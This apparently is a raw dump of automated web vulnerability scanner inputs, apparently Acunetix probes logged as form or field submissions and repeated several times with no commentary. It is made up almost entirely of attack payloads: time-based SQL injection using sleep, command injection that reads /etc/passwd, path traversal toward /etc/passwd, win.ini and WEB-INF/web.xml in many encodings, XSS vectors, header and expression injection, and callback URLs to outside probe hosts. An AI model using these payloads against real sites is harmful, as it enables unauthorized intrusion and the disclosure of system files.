if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(994080)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(958607)>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

${100077+100023}

1<ScRiPt%20>prompt(962619)</sCripT>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1&lt

-1))

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n958571=v936319

)

1

\xf6<img acu onmouseover=prompt(936683) //\xf6>

1

ozLHGO9G'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(964153)>

AI7t3Zul')

1

"|"ld

/etc/passwd

1

jBCUH4LE'))

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

[url=http://www.acunetix.com]website security[/url]

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

'

1_2bdxJ <ScRiPt >prompt(944586)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitKMtXOI4Q6o.bxss.me/

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

MdKUX1HV'

||cat /etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

1

1

LUVD66ZN')

1

1

&dir

file:///etc/passwd

comments

1

'"

1

1

ENd01I6X'))

1'"()&%<ScRiPt >prompt(953359)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

comments/.

1

WEB-INF/web.xml

<!--

1

1

'"()&%<ScRiPt >prompt(983601)</ScRiPt>

1

"&dir&"

1

1

WEB-INF\web.xml

1

1_985118

1

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

1

1

acu4347\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4347

../../../../../../../../../../boot.ini

1

'|dir

1

1

1

acux7779\xc0\xbez1\xc0\xbcz2a\x90bcxuca7779

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"|dir

1<ScRiPt >prompt(954337)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(920011)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(916392)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942209></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(912788)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(922279)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944365)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9212772*9056803)

1<div style=width:expression(prompt(986107))>

1

&cat /etc/passwd&

1

'+response.write(9212772*9056803)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9212772*9056803)+"

1

1<body onload=prompt(922694)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928053)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=xyz OnErRor=prompt(950116)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(913494)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

${99954+99751}

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(994393)</sCripT>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n972200=v980400

1&lt

1

-1)

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(942836) //\xf6>

'|'ld

-1))

1

1

!(()&&!|*|*|

1

'"()

1<input autofocus onfocus=prompt(951989)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

GryKD2ZQ'

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

1

1

[url=http://www.acunetix.com]website security[/url]

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GoPU57jR')

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1_qyH0D <ScRiPt >prompt(925180)</ScRiPt>

'

lTOi7B5W'))

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

"

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitOJkwnqMhXI.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

-1))

comments

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

VK40yE64'

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(962388)</ScRiPt>

1

comments/.

1

<!--

G2KNCdWL')

1

"&dir&"

file:///etc/passwd

'"()&%<ScRiPt >prompt(951824)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

LZENK4Ke'))

|dir

1

1

1

1

WEB-INF/web.xml

1

1_955482

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

acu9250\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9250

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4817\xc0\xbez1\xc0\xbcz2a\x90bcxuca4817

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(909172)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(908024)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(918364)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954068></ScRiPt>

1

1

1<ScRiPt >prompt(976053)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(933304)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921315)"></g></svg>

1

1

response.write(9025564*9257958)

1<div style=width:expression(prompt(902899))>

1

1

1<iframe src='data:text/html

'+response.write(9025564*9257958)+'

1

1

"+response.write(9025564*9257958)+"

&cat /etc/passwd&

1<body onload=prompt(944094)>

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927297)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3.063),0)/*'XOR(if(now()=sysdate(),sleep(3.063),0))OR'"XOR(if(now()=sysdate(),sleep(3.063),0))OR"*/

1<img src=xyz OnErRor=prompt(984589)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(912664)>

1

(select(0)from(select(sleep(3.063)))v)/*'+(select(0)from(select(sleep(3.063)))v)+'"+(select(0)from(select(sleep(3.063)))v)+"*/

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(999286)</sCripT>

-1

1

${100284+99709}

1

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(966660) //\xf6>

1

1&n969967=v956522

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

-1))

)

'"()

1

1<input autofocus onfocus=prompt(947154)>

1some_inexistent_file_with_long_name%00.jpg

1

1

SqvDJD4f'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/etc/passwd

1

d6Bgmpq1')

^(#$!@#$)(()))******

1

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

p8wOouA1')

'

1

1_JnYOb <ScRiPt >prompt(931898)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

yu0bxJJX')

1

1

"

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitun1bBomhXq.bxss.me/

||cat /etc/passwd

1

vbd2kgGs'))

1

1

1

${@print(md5(acunetix_wvs_security_test))}

comments

1

&dir

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

'"

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

-1)

"&dir&"

1

1'"()&%<ScRiPt >prompt(987576)</ScRiPt>

1

1

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(961449)</ScRiPt>

1

|dir

1

1

WEB-INF\web.xml

1

1

1_916548

'|dir

-1))

1

1

../../../../../../../../../../windows/win.ini

1

1

FAlkOztE'

"|dir

1

1

../../../../../../../../../../boot.ini

acu1799\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1799

1

y1hQvpX3')

1

1

acux5994\xc0\xbez1\xc0\xbcz2a\x90bcxuca5994

../../../../../../../../../../windows/win.ini.jpg

S4r7XIvo'))

1

1

1<ScRiPt >prompt(976852)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(934373)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(953716)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922640></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(916546)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(981628)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999964)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(962858))>

1

1<iframe src='data:text/html

1

1

response.write(9071622*9344222)

WEB-INF/web.xml

1

1<body onload=prompt(949216)>

1

WEB-INF\web.xml

1

1

'+response.write(9071622*9344222)+'

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911904)>

1

1

1

"+response.write(9071622*9344222)+"

1

1

1

1<img src=xyz OnErRor=prompt(911372)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(968536)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1

1

1<ScRiPt%20>prompt(955132)</sCripT>

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&lt

`cat /etc/passwd`

-1

1

${99827+100316}

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(947222) //\xf6>

1

-1)

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n994223=v955074

1some_inexistent_file_with_long_name%00.jpg

1<input autofocus onfocus=prompt(971163)>

1

-1))

1

1

)

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

36KSWw6t'

1

1

!(()&&!|*|*|

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

Ggs7x0TN')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1_EeVMy <ScRiPt >prompt(932848)</ScRiPt>

WbuVUcg5'))

1

1

1

'

1

1

"

-1

/etc/passwd

1

1

1

1

1

"

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitH7Kr3iAWcU.bxss.me/

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

comments

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

a9fWDmxF'

comments

1

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

R9YgqW77')

'"

1

comments/.

1'"()&%<ScRiPt >prompt(936083)</ScRiPt>

1

1

"&dir&"

g4ML9vZH'))

<!--

1

1

'"()&%<ScRiPt >prompt(943398)</ScRiPt>

file:///etc/passwd

1

1

1

1

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1_903394

1

1

1

'|dir

WEB-INF/web.xml

"|dir

1

1

WEB-INF\web.xml

acu9683\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9683

1

1

1

1

../../../../../../../../../../windows/win.ini

acux2276\xc0\xbez1\xc0\xbcz2a\x90bcxuca2276

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(997758)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(964981)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(930384)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949938></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(915481)</ScRiPt>

1

1

response.write(9426447*9827098)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(915209)">

1

'+response.write(9426447*9827098)+'

&cat /etc/passwd&

1

"+response.write(9426447*9827098)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931833)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

1<div style=width:expression(prompt(963021))>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(975860)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

${99956+99088}

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916441)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img src=xyz OnErRor=prompt(964009)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1))

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n909861=v911665

1<img/src=">" onerror=alert(983151)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

qcQ0ighv'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

'|'ld

1<ScRiPt%20>prompt(975938)</sCripT>

1

testasp.vulnweb.com

1

tYTqJ1Do')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

"|"ld

'"()

1

1&lt

^(#$!@#$)(()))******

1

B5JZg9s7'))

/etc/passwd

1

1

1

\xf6<img acu onmouseover=prompt(925093) //\xf6>

-1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1)

1<input autofocus onfocus=prompt(953875)>

'

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

1

"

1

http://hitcs69gY9vr7.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

R6n8MGJh'

[url=http://www.acunetix.com]website security[/url]

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

&dir

1

xZY26Rr8')

file:///etc/passwd

1

http://www.acunetix.tst

1_xBh0u <ScRiPt >prompt(976485)</ScRiPt>

1

comments

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

TFyTXFWp'))

'"

1'"()&%<ScRiPt >prompt(920403)</ScRiPt>

1

1

comments/.

1

1

"&dir&"

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(985533)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1_932891

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

acu10962\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10962

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

acux9128\xc0\xbez1\xc0\xbcz2a\x90bcxuca9128

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(929231)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(942272)</script>

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(998303)</ScRiPt>

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900809></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(945235)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(976274)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926122)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(908633))>

WEB-INF/web.xml

1

1

response.write(9397779*9752460)

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

'+response.write(9397779*9752460)+'

&cat /etc/passwd&

1

1<body onload=prompt(988475)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"+response.write(9397779*9752460)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968870)>

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(992607)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(931014)>

1

1

`cat /etc/passwd`

1

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(934205)</sCripT>

${99554+99152}

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1&lt

1

1&n900251=v951510

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

\xf6<img acu onmouseover=prompt(907177) //\xf6>

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

i44Pfv5Y'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<input autofocus onfocus=prompt(980672)>

'"()

testasp.vulnweb.com

1

^(#$!@#$)(()))******

BKSTF9O0')

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

'

1

1

1

2i32QrPW'))

1

1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

1_cCffb <ScRiPt >prompt(969413)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitgNPY0Svd3i.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

-1))

'&dir&'

1

1

1

http://www.acunetix.tst

1

1

file:///etc/passwd

comments

rDgFh600'

1

'"

1'"()&%<ScRiPt >prompt(927048)</ScRiPt>

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

qB74u1tf')

1

<!--

'"()&%<ScRiPt >prompt(979832)</ScRiPt>

1

1

|dir

WEB-INF/web.xml

1

j7jz9hbp'))

1

1_978004

1

1

WEB-INF\web.xml

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu4976\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4976

"|dir

1

1

../../../../../../../../../../boot.ini

1

acux3520\xc0\xbez1\xc0\xbcz2a\x90bcxuca3520

1

1

1

1<ScRiPt >prompt(993102)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(951023)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(960662)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902272></ScRiPt>

1

1<ScRiPt >prompt(903077)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(950629)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962863)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(909313))>

1

response.write(9533932*9339430)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

'+response.write(9533932*9339430)+'

1

1

1

1

1<body onload=prompt(984611)>

"+response.write(9533932*9339430)+"

1

